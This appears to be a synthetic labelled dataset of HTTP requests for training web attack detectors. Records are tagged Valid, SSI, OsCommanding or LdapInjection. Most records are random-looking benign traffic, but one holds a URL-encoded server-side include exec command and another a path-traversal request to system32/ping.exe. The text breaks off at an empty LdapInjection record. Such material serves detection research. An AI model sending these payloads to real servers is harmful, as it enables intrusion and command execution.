Via: FTP/4.7 www.xrnji.gif:81
Transfer-Encoding: deflate
Upgrade: te4gye/2.3, elsad/9.1, hedM/8.6, a0ndP/0.7
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 1360027
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47308
Start - Id: 30284
class: Valid
GET /t5tfo3frlexlpiho/dofVMHOyzSN2gbt/bO_.asmx?doeenmtc=946326&SH9Mi=slbrz5ech6kut&esnenlaStnetk=c%3Ca5riHrwoRen&liif4eaReefAtE=qUhYKepU&eyts9=t5w+l&sNtneCe9t=qWUsmT1T%40_&9n5pes=9efdak&miDln=984&ludhehydun=eJg8uH HTTP/1.1
Host: www.rTaa5ttb.gov:97
Connection: a6sgs
Accept: image/png;q=0.4, audio/x-wav, video/*
Accept-Charset: *
Accept-Encoding: identity;q=0.9
Accept-Language: 4ae-c6coeptc;q=0.8, pccnede-241;q=0.3
Cache-Control: no-cache
Client-ip: 175.193.129.29
Cookie: soidlehtacs=08;annHwoslnleeElh=918112;948C6m4stylexwV=305224750;gt@CUjbgsoundncL6O=GuztcopyouxU5 e&e agroup by5vi;HwrfeLtojellwg=m(Adropc%tc' ra@N<u
Cookie2: $Version="31"
Date: Tue, 30 Jun 09 13:23:25 GMT
ETag: "qD-cIxWnIgufy6Wwdjh"
Expect: 100-continue
From: hgNhns@5tun.biz
If-Modified-Since: Fri, 08 May 09 12:17:14 UTC
If-Unmodified-Since: Mon, 06 Mar 06 03:46:19 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Apr 07 08:11:25 CET
Max-Forwards: 8
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic ZWR0dDpFaGVvOQ==
Authorization: NTLM cncyZWZybWM2WW5hbjNTZ3d0azZsMGxhaTBoN2FkaWFuTXNuM25heXN5eXc=
Range: -915389
Referer: http://tieieh.de/rjdt.png
TE: gzip,deflate;q=0.8
Trailer: Range
User-Agent: Mozilla/1.3 (compatible; Konqueror/3.4; Solaris; ehoNer; tutteirsL7)
UA-CPU: MIPS
UA-Disp: 1132,2710,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9593x7407
Via: HTTP/9.8 www.beEtlbo.jpeg, asb/7.8 www.coef6jEa.png:59558, FTP/0.7 113.14.189.98
Transfer-Encoding: compress
Upgrade: ebeeeA/4.0, bnny5a/4.5, hdfrAb/1.2
Warning: 070 128.156.53.251 "iatatkou" "Thu, 07 Jul 05 12:51:29 CET"
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 60742
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 30284
Start - Id: 28094
class: Valid
GET /oROXDRzTxF@ujE/a9zeeh4oasireirit/J-@McS/tkTDd/gys8ctai/fGSTpYb4eVL/m6Stz8c9.mdb?6ANg3form=mdh&aogh6tadkn=sqs2&WBiVr8aCGj4d=1224586373&thi=ve7oii+%2Fe HTTP/1.0
Host: www.bddszN.net
Connection: Pastfnr
Accept: */*
Accept-Charset: x-mac-japanese
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: hspretut='1ct'
Client-ip: 44.38.86.47
Cookie: tTeei1acsv=t=ke3l2tei+ai;ce5uaoos=1631150;Vseekenh3eld=28971;irDwn=@uya;6aisnhcS=Gf9hcq
Cookie2: $Version="6"
Date: Thu, 19 Mar 09 16:48:05 GMT
ETag: W/"XUfnP3E3zKGKY_kZ_"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Mon, 14 May 07 07:46:33 UTC
If-Unmodified-Since: Sat, 19 Jun 04 23:14:06 GMT
If-Match: "hGjdWKfXMjMaFpab"
If-None-Match: *
If-Range: Thu, 20 Aug 09 24:51:03 CET
Max-Forwards: 772
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM c2huT3NveW4xN2lnNm5yeW9qbDR0ZmV1QUhvcmxhZXR0b21hZA==
Authorization: Digest nc=4fa71612
Range: 165-,839-
Referer: http://aeilsape.org/6pake/aiip/fEmaitmm.dll
TE: deflate,chunked;q=0.6
Trailer: Accept-Charset
User-Agent: z.Z9.U7 http://www.Nnc3iI.ch
UA-CPU: MIPS
UA-Disp: 166,4722,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 630x5216
Via: FTP/3.8 www.c3vnoba.tiff
Transfer-Encoding: dDuE4; ffrt=wddylHee
Upgrade: bdNih/1.1, xdHnh/3.6, htee/4.4, 6mIer/6.0
Warning: 585 www.081x.html "mItb" "Sat, 28 Jan 06 07:00:52 GMT"
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 16577786400962
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28094
Start - Id: 5254
class: Valid
PUT /i8Oheaosoemthroem/2ms_tMa4Kn0J/Its3sQitftndoa6pT/eisaOkr/k@/irShgJ/eoE0jNtans.htm? HTTP/1.0
Content-Length: 238
Content-Language: nttcuptx,hcssa
Content-Encoding: gzip
Content-Location: /qcmds.png
Content-MD5: b25pbkVld2FHZW5zQnRtbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 02 Jan 10 13:11:37 UTC
Last-Modified: Sun, 27 Jun 04 09:16:27 CET
Host: 175.0.69.122
Connection: keep-alive
Accept: video/*;q=0.6, audio/*, image/gif
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 176.242.175.221
Cookie: rsec=e]stiSenrupdatet
Cookie2: $Version="40"
Date: Fri, 01 Dec 06 03:24:02 UTC
ETag: "Q9wBF0sGQY7tVsFK"
Expect: Nsdwtoa
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Thu, 01 Apr 04 20:59:01 CET
If-Unmodified-Since: Sun, 16 Sep 07 14:07:49 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 11 May 07 23:13:12 UTC
Max-Forwards: 3
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM Z2ZmYnRncmFhdGVyRml0aXNlcmR1QzdsZHJ1cGR1OE5wYWVodG0=
Authorization: xnnt8 th9sth=nnemtle
Range: -061
Referer: http://t9icvd.ch/hk9dloi/irethbvd/gesBs4/PiddSoy/hb1otb.jsp
TE: trailers,chunked;q=0.3
Trailer: Trailer
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 0.8; av-fc; rv:7.7.2) Gecko/16043772
UA-CPU: 68000
UA-Disp: 507,781,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4414x768
Via: HTTP/1.2 220.36.223.157, HTTP/5.9 www.4yhzs.tiff
Transfer-Encoding: compress
Upgrade: tMhm/1.0, C7euh/3.4
Warning: 526 www.cbflN.html "hsea" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 76349451666157165
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

e1nn0ee=mArNM_&sg5nQstT=b@W&ecrouak9wioi0Si=2cr6eadSl&zih0euorwEoT=Uethetgnt1Easol0t&eWseiei=2u&TAKF=esdivtwinnther&ym0hbete=de7s7gigwoldodfi&s4ckXpn=d4VXSEtV-EJ&jEd=23117213&oaLreITrpl3sw=ii2mxn&1ohr=img no&Aldaetawadied4=xiapcentdoMsh

End - Id: 5254
Start - Id: 21675
class: Valid
GET /vybIpgootoefhhro/iBJGUOMJVIX-/tV5q1/i.e/rceet7a/iB-RY5U5Dc.php? HTTP/1.0
Host: www.63ehm.ch
Connection: keep-alive
Accept: text/xml;q=0.1, audio/*
Accept-Charset: windows-1252;q=0.0, shift_jis;q=0.7
Accept-Encoding: 
Accept-Language: a4f-an, aXrvea-hanlxls5
Cache-Control: only-if-cached
Client-ip: 8.140.139.237
Cookie: wqKzFFl=huton;devefyvlomtsYLt=eninipioeaAsteno
Cookie2: $Version="9"
Date: Sun, 25 Jan 04 02:20:10 CET
ETag: W/"PMH3mRdbr9zn8H8bvP"
Expect: hAesog
From: hrhe@thdtgL.uk
If-Modified-Since: Thu, 15 Nov 07 15:43:01 GMT
If-Unmodified-Since: Sun, 07 Mar 04 09:36:56 UTC
If-Match: *
If-None-Match: "WkutdW@uw0Dtr7zHz0K"
If-Range: Mon, 10 Aug 09 08:33:10 UTC
Max-Forwards: 8262
MIME-Version: 9.6
Pragma: u='euY'
Proxy-Authorization: naoa orne=tnlmssv
Authorization: Digest username="s4hv4"
Range: 73394-4909,050042-,203-3
Referer: /ea1zrine/eEoR/cite.mdb
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 3.4; ao-ea; rv:4.6.6) Gecko/75519951
UA-CPU: 68000
UA-Disp: 6270,1333,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5233x580
Via: 8.4 109.148.132.211, 7.9 www.o5tt.html
Transfer-Encoding: compress
Upgrade: rez4na/9.8
Warning: 014 123.249.187.19 "ccuiedee" 
X-Forwarded-For: 153.189.235.245
X-Serial-Number: 3680166238
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21675
Start - Id: 40323
class: SSI
GET /0O3unionaEOGacceptupdatewzXFK/gfFVZDggXz3GLgty/ua7KbBU2f.z5u/eeihbe/se4rTenQiswpNne6cDTB/b.Vz9j5Gi/dit.html?egrrqogaGledim=enodebt&bxFN6ECBB=561761330&vinTo5eoht=%3C%21--++++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5C6ipigttao%5CRc%5Ci6Sc7et.exe++++d%3A%5CtD15uarnam%5Cwww.niicinnsil.org%5CvsO%5Cdatabase.mdb++%2Fx++exporttofoxpro%22--%3E&ekLodrhoEe6=73213&os7dudFsce=989393 HTTP/1.1
Host: www.smfedr5.be:8
Connection: xeiyDdnn
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 239.88.55.52
Cookie: vPjlaP8K=ofp;5nttE=06;dghaehe=8085;rsr=sock_streamos;ca=\nlstdin2 linkc%9;NAei1odmpiha=23558194
Cookie2: $Version="171"
Date: Wed, 18 Oct 06 20:15:03 UTC
ETag: W/"3aL2s0eosA_dmr_vq"
Expect: z0lexn8
From: 5sd2@aayBcy.de
If-Modified-Since: Mon, 02 Aug 04 10:21:05 GMT
If-Unmodified-Since: Fri, 12 Mar 04 11:15:16 GMT
If-Match: *
If-None-Match: "lFpurYD-4izqy-e70u6P"
If-Range: *
Max-Forwards: 98
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: NTLM dTFwbnVzZGVsZW81Y2dvc2RsQTF0bWc0aElubmNucmllYXRh
Range: -2115,0045-233,-51
Referer: /mn0u2gim/aceai/eilfw/lcRig.cfm
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/4.1 (compatible; MSIE 5.6; WinNT; nratel; Epllldds)
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: HTTP/5.4 146.2.135.165, FTP/3.2 www.etner.htm, 7.8 www.onaue.tiff
Transfer-Encoding: identity
Upgrade: lsMg/8.4, roInr/1.2, reHn0e/2.0
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 114.213.56.41
X-Serial-Number: 475557970524
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40323
Start - Id: 5581
class: Valid
PUT /i-B/JkZ55PYmR/epepeqmeeTIyuj/aU-z/hykQ0ltxhV1@2FU5u2V/wsntoh4Mo/EniretT7heotoab8g/_document0@9xtermztojq.tiff? HTTP/1.1
Content-Length: 110
Content-Language: e,ssrhy
Content-Encoding: identity
Content-Location: http://www.vYeh.de/onobf/frli.zip
Content-MD5: b2Y2eHNvZ3R6NG90aW1lbA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Mar 10 03:35:30 UTC
Last-Modified: Sun, 08 Oct 06 18:51:09 UTC
Host: 83.153.191.18:151
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=6
Client-ip: 69.57.15.36
Cookie: sirhentlh=9465036036;GTIHADkBcpu5=sbceaeaaot;ntciso=9138
Cookie2: $Version="811"
Date: Tue, 21 Nov 06 17:18:20 UTC
ETag: "fuxz3LZh9X2M1kWy0"
Expect: 100-continue
From: ddE5mq0u@tano2i.be
If-Modified-Since: Thu, 30 Jul 09 08:30:27 CET
If-Unmodified-Since: Wed, 17 Sep 08 12:48:28 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 6.2
Pragma: iahsi=hRtasocn
Proxy-Authorization: c9oqp 5lei=rnNhes
Authorization: Basic YUF0RzptZ3ZU
Range: 673-
Referer: http://ttst.ch/rwUwrstu/pyakEh/nj4ae/clotuh.jpg
TE: gzip;q=0.4
Trailer: If-Modified-Since
User-Agent: eZmL1U3-xV http://www.ittt.fr
UA-CPU: x86
UA-Disp: 972,439,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0202x3743
Via: 4.9 205.41.102.25, iiH/5.9 www.euht.jpeg
Transfer-Encoding: gzip
Upgrade: aCrv/3.2, uNt/4.1, agThej/0.7
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 180.152.86.133
X-Serial-Number: 07654558799930280172
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kdotecinxL=deqeCis&aaiobn=5&sgds=~c-&0XkpunionVPPJh=tqEaxiBwsxeecsfrj&0toT3Tz=;94ht-&T1rfSrieI2nlspe=SoagS

End - Id: 5581
Start - Id: 7359
class: Valid
PUT /assiaenl8ry/fta7uN/2Ahupn9nuros.swf? HTTP/1.1
Content-Length: 120
Content-Language: aenetE
Content-Encoding: compress
Content-Location: /3hso8eAe/lnsmt/rasib/ycbu.jpg
Content-MD5: ZXU0Um1haVNIc254b2hJbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jan 08 22:24:20 CET
Last-Modified: Mon, 21 Sep 09 18:41:46 UTC
Host: 91.183.60.59
Connection: keep-alive
Accept: audio/x-wav, audio/*
Accept-Charset: x-mac-cyrillic;q=0.8, iso-8859-15, euc-tw;q=0.2
Accept-Encoding: deflate;q=0.1, deflate, identity, deflate;q=0.0
Accept-Language: ptchn-cg;q=0.5
Cache-Control: no-cache
Client-ip: 40.118.223.19
Cookie: aahkOi1sdihz4Td=1366091;rmca=028;foele=p.hv;H2RfOyHBJ=tWu;ouh=obgsounddPQ
Cookie2: $Version="0"
Date: Sun, 14 Dec 08 11:02:30 CET
ETag: "4n1OEXxdHpCrGn1"
Expect: 100-continue
From: meeit@m7Q8t.cz
If-Modified-Since: Tue, 20 Oct 09 12:58:47 UTC
If-Unmodified-Since: Mon, 23 Feb 09 16:42:15 UTC
If-Match: "MlSThO9xB1D5ejuohb-V"
If-None-Match: *
If-Range: Mon, 09 Mar 09 13:27:07 GMT
Max-Forwards: 64
MIME-Version: 3.6
Pragma: 5tel1uBe=onll
Proxy-Authorization: Basic eW5lb3RJek86NWZjdA==
Authorization: Basic bG1od2R3bDpuRDd0bQ==
Range: -38,928255-,664-
Referer: http://www.ayt2.fr/oewsadsp.swf
TE: trailers,deflate;q=0.6,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.0 (X11; U; Unix 7.4; 4i-kt; rv:4.4.3) Gecko/73615960
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 626x2025
Via: HTTP/5.4 129.57.42.198
Transfer-Encoding: gzip
Upgrade: heer/1.8, hjiO/5.4, eAtc/2.6, eotk/8.4
Warning: 556 134.7.7.53 "loiQefflen" 
X-Forwarded-For: 199.98.82.192
X-Serial-Number: 33978029627174385263
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rroedtlnjte=wcbnetcat&shyrswhae7ntb0=sre|hieaes n&pe=dg n&etioElkmiwexs=oitjhfOfHesgdte&orc27mzl=[e0iire&Iewpl=28289

End - Id: 7359
Start - Id: 44254
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: www.rvtf.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: Acwta='nncutitc'
Client-ip: 182.20.30.117
Cookie: mteiae7re=9F7HkM;98juh=ki;iwa2uRLsjh= l;mnaNAoZe5hs=5-w
Cookie2: $Version="03"
Date: Tue, 15 Mar 05 09:34:35 GMT
ETag: "tuLT6v@wLJeEsjmz"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Mon, 02 Apr 07 08:45:47 UTC
If-Unmodified-Since: Tue, 28 Dec 04 13:56:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 832
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM aXU3aWFyc3Nham9pQml5b2VudE5waXJhc2VjbWhhWGNrZG5lc2hlcg==
Authorization: Digest nonce
Range: 9644-,6569-1848
Referer: /d9qc/nomd9v0c/wyny/oghhw/todb.asmx
TE: trailers,trailers
Trailer: Range
User-Agent: pbXDoo2 http://www.Inode.org
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 352x848
Via: nkcs/7.2 1.115.211.237, 9.3 70.234.89.40, 9.4 www.sce6ti.htm
Transfer-Encoding: identity
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 226 1.81.131.108 "aituhaeselhhae" 
X-Forwarded-For: 152.199.223.60
X-Serial-Number: 87791101469123011682
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44254
Start - Id: 15348
class: Valid
GET /Dq64R4_3e3W.php3?ssnlbdty=tpl+child%27mgd&Ili4ah=k%3EtredhoOikot&wn=dydr7r&osaOam75awch=0-%28tNwpr&Vrentdsducjz=aetweatl&xp_shutdown2VOmJlZo=506&2p=29667&nga6of=%40neohbodyew7c9ria&mxandapylihzcem=meta2+&y2i-CymP=50220076 HTTP/1.1
Host: www.pqenhWet.net:80
Connection: ne8eqbe
Accept: */*
Accept-Charset: cp-950, x-mac-roman, iso-8859-3, utf-7, shift_jis
Accept-Encoding: deflate;q=0.0
Accept-Language: *;q=0.1
Cache-Control: max-age=634
Client-ip: 21.23.172.64
Cookie: g8ewiqffdys=8Oonhie13nnitimo;oPire1=766;nedsdLhDje=41765915;vicEecrrrlda=9390797490;tilse=ciFdlcimg;9i6oyt7u=or-:
Cookie2: $Version="68"
Date: Fri, 25 Aug 06 05:20:34 GMT
ETag: "HcKP4MxR0@ipAFK"
Expect: fdseu
From: 0dpjRd@6hfr.uk
If-Modified-Since: Mon, 12 Dec 05 07:52:39 GMT
If-Unmodified-Since: Sat, 31 Jul 04 21:23:04 CET
If-Match: "EzU3@@6BGmmmsmtsgLvf"
If-None-Match: *
If-Range: Sun, 04 May 08 20:13:25 GMT
Max-Forwards: 1183
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: nlEie nolrwi=fmzBr
Authorization: Digest algorithm=MD5
Range: -20607,08-,-679023
Referer: /jnnK.aspx
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.2 (Machintosh; U; PPC 2.5; 1R-9m; rv:7.2.9) Gecko/04685883
UA-CPU: Sparc
UA-Disp: 4257,289,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 065x683
Via: 5.8 143.169.155.120:6, 4.7 167.214.208.180, HTTP/3.7 www.rEau4t.tiff:98853
Transfer-Encoding: identity
Upgrade: Tlel/3.6, uAR/9.8, are/8.8, cso/3.7
Warning: 486 147.132.247.92 "m5pjeocbh" 
X-Forwarded-For: 139.65.0.173
X-Serial-Number: 7835814731
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 15348
Start - Id: 34787
class: Valid
PUT /oqdxMmKgt5s/ifmtLte/uX5aLjn71AsWd4/JICMg2.2vjD/raInnf.gif? HTTP/1.1
Content-Length: 116
Content-Language: zus,h25i
Content-Encoding: compress
Content-Location: http://www.pHroe.biz/p0b5me/dst1/ababo/ml7esd.rar
Content-MD5: YXRkU2FzMUljc2VOQWFkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 06 Aug 09 05:12:17 UTC
Last-Modified: Tue, 08 Sep 09 12:16:24 UTC
Host: 33.112.209.189:80
Connection: close
Accept: image/jpeg, text/*;q=0.1
Accept-Charset: x-mac-greek;q=0.7
Accept-Encoding: identity, identity, identity, deflate, compress
Accept-Language: drniMo-BnjuNa;q=0.4, ob-tne, abao-hrjasser
Cache-Control: B='ticaus5'
Client-ip: 100.1.231.182
Cookie: CJidopenl=08246;rTya=mswvwretTuue
Cookie2: $Version="7"
Date: Fri, 09 Feb 07 20:59:19 UTC
ETag: "OeWeq0YsatJXLYdH"
Expect: 100-continue
From: idbn@itnhem.uk
If-Modified-Since: Sun, 22 Nov 09 11:48:10 GMT
If-Unmodified-Since: Wed, 06 Sep 06 17:35:59 GMT
If-Match: "ocr@qWiBseEH5zfm3WI"
If-None-Match: "QNeM22T2ferrzGfa"
If-Range: *
Max-Forwards: 8571
MIME-Version: 7.2
Pragma: hc='noomn'
Proxy-Authorization: Digest opaque="eRl54bWu"
Authorization: si7hih ruihl=srkaSe
Range: -32368,1-
Referer: http://www.1ior.it/fr45Oc/eptuh8mn/dnpspn.pdf
TE: trailers
Trailer: If-Modified-Since
User-Agent: antr/3.3
UA-CPU: x86
UA-Disp: 232,5423,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 262x4505
Via: 7.9 234.184.203.184, 3.9 159.61.224.116, 1.1 www.iltITlwn.html:83
Transfer-Encoding: h7rf; s2mi6=hhtSnta
Upgrade: nua/5.0, lie/6.6, on7/3.1
Warning: 938 www.isiGfs.shtml "hHns1nh" "Wed, 20 May 09 08:56:42 CET"
X-Forwarded-For: 172.233.127.122
X-Serial-Number: 438515700357527
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ihieranhshwlmjN=dsy0ko&3wciynin82a=a6twmCYn&A6t5noBhrgea8=7WTe&hodllpozCsst= anr)&tra=0&az=ht1noswetymecd&vuuu=ehd

End - Id: 34787
Start - Id: 25962
class: Valid
GET /azewti03ioehtReb0eg/diDcd/sdhBee/32f0vi9XN6/nE6sndieeotrflepo/atxr9iNet6wA10Dl/la7m/ietaeddoehwey/nwNYzYQUrVHWJv4iy5i5/btrgasl/vzzR/ajluv5o5llx4e.js?mdnP=l_jwC9&v7cmmeco=i&h4spiufRushetb=9554&hresURa4t=htaccesdropnscmdgwi&udel=vassaccess_logunowsEnio7%3E&osnntruiArenn=lEtrnhnCso8&asf=tKoqXCQc&eCarahscRry=sf2j&ttmveeLwl2xshr=etftntmxmls-&tdQvhechmouec=5nnuae&Uoooesnnluts=01915260&h7h6orsui=1&tueueuereta=ji HTTP/1.0
Host: www.hMwi1eiy4.de
Connection: keep-alive
Accept: audio/*
Accept-Charset: euc-kr, windows-1254, utf-8, windows-1254, x-mac-cyrillic;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: 9iOdlf-t2ae0oH;q=0.4, saTk-ne
Cache-Control: only-if-cached
Client-ip: 24.235.222.46
Cookie: KkVo-a6E794r=1752321;fnm=827938023;2asvth=e6tqaeeEdcn;UyPsessnetnC=95594;erhrEzmn=om i'
Cookie2: $Version="4"
Date: Tue, 27 Apr 10 13:02:29 UTC
ETag: "TjVyQPRvteh7c_AvG"
Expect: 100-continue
From: hahboO@zeaEhuooa.net
If-Modified-Since: Sat, 12 Mar 05 14:54:02 CET
If-Unmodified-Since: Thu, 06 Nov 08 11:56:37 GMT
If-Match: "tDef14@ngi.fT7z1K"
If-None-Match: *
If-Range: *
Max-Forwards: 0181
MIME-Version: 1.4
Pragma: eN7p=s
Proxy-Authorization: dq3Bsa A2qrtl=9wki
Authorization: NTLM cmFnZXV1ZTBzaVJBT3NlZVRuZUVwYTJucDQwMmVscGVkYThl
Range: 041-
Referer: http://www.olde9EHe.org/1eoTact/mhus/9u7wowhf.jpeg
TE: trailers,trailers
Trailer: Host
User-Agent: w5QPcvn http://www.ttOnb.org
UA-CPU: MIPS
UA-Disp: 8630,9369,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5187x1770
Via: 0.9 www.imevlyfa.js
Transfer-Encoding: tmpmm; Oorn=5hes
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 432 www.i3ei.js "ertmdUhs2iS" 
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 7358470
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25962
Start - Id: 14508
class: Valid
GET /ont/zPvZ26-khZ0-_6mmGb8/uiadie/rj/N_Qrps/rEO2FnB@mORrkdOkU2.v/trbc15Walswqortbh9eq/mnygb3vf/Ttbmiornsnst8gazt0a.jsp?ispt=0smotmwyEhome%29aiu5oettm&axeEeetionf=88819&q0eunco=bE6N7iPiNtp6&ehsauwiIxeqtce=ehzetsn%25lCi&Lh=nrqdiu&HinsertWC=uy6&btbr=5&7rGnGe3reuoev=aThsaaei&agroup byso=3972 HTTP/1.0
Host: 166.160.166.126
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ih-nlr;q=0.2, n-iihssIl
Cache-Control: max-stale=462
Client-ip: 76.119.134.191
Cookie: reeeydk92a=iidocument;iliCnoudeg=635716;aL=oBm7iL;etin4ioS6Nten=c%
Cookie2: $Version="0"
Date: Fri, 23 Feb 07 12:51:39 GMT
ETag: "3Lh1Iors9NvNnJs"
Expect: 0cOtbl=uesE1sos;hgltdia=otqn
From: tegitG@nwslt9.biz
If-Modified-Since: Thu, 08 Jan 09 10:19:17 CET
If-Unmodified-Since: Mon, 14 Nov 05 07:12:38 UTC
If-Match: *
If-None-Match: "5yJ6UaWnVqGDGlgNHn_W"
If-Range: Sat, 06 Nov 04 01:34:20 CET
Max-Forwards: 2950
MIME-Version: 1.3
Pragma: n='lrCsoaI'
Proxy-Authorization: NTLM cHRub2xscmZmcHR0UHNlbmxhcWFkMURlZUUxbVllaG1yd3Bo
Authorization: Basic cW50c2lOdTp0ZW51bWVl
Range: 06557-0,55484-,7261-
Referer: http://zg0a9nee.gov/qeetfi2/epltea/i6tur/tooj.css
TE: trailers,trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/5.9 (X11; U; Open BSD i386 7.4; n7-Te; rv:6.4.0) Gecko/12607673
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 866x6745
Via: HTTP/4.8 148.164.43.193
Transfer-Encoding: deflate
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 338 80.216.37.194 "fitvnh2aoeEk" "Mon, 17 Dec 07 02:56:19 UTC"
X-Forwarded-For: 33.83.28.62
X-Serial-Number: 01337
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 14508
Start - Id: 2529
class: Valid
GET /uzsdsas/eqhcjTF/MU/ra8CCeECvPJds/Bqb@k.jpeg?bgsoundaTn3HP.=wp2E0iframen&fIhralmpt=44933049 HTTP/1.1
Host: www.g1tpu0oa.be:1
Connection: DeneTMes
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 171.191.7.222
Cookie: xnode7vqr=dCJsi0
Cookie2: $Version="794"
Date: Mon, 05 Jan 09 02:44:54 GMT
ETag: "q8YGywLGRe0sANj"
Expect: 100-continue
From: nnxgy@Ttnc1ez.uk
If-Modified-Since: Wed, 14 Apr 10 10:03:18 CET
If-Unmodified-Since: Tue, 14 Mar 06 03:59:40 CET
If-Match: "is7y4-G-dDK5qwT7b"
If-None-Match: "CVepwrDBUNQzyoZSt"
If-Range: Thu, 17 Mar 05 17:37:47 CET
Max-Forwards: 46
MIME-Version: 1.2
Pragma: ETEia=tc
Proxy-Authorization: Basic dGl2dEVleHI6Zm5tZ2g=
Authorization: rte9d xtnd=2uyepni
Range: 32-6,-041504
Referer: http://www.aseiyr.cz/ueetSl/Nwn5un/jbl3h/huehe/ea2qr.nsf
TE: deflate;q=0.6
Trailer: Referer
User-Agent: Mozilla/3.3 (X11; U; Linux i586 5.8; nt-ar; rv:2.2.5) Gecko/52608627
UA-CPU: MIPS
UA-Disp: 284,569,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6834x6538
Via: HTTP/6.0 50.4.186.154, rrS/6.2 www.kercex.tiff, 8.2 www.rfJce.css
Transfer-Encoding: gzip
Upgrade: ia4er/9.3, i4os/2.0, 2ctlrr/2.8, ssda5h/3.4, t6p/1.9
Warning: 301 www.naet.js "Hsh2meee5a" "Sat, 22 Apr 06 15:10:43 UTC"
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 347745233258688600
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2529
Start - Id: 38505
class: LdapInjection
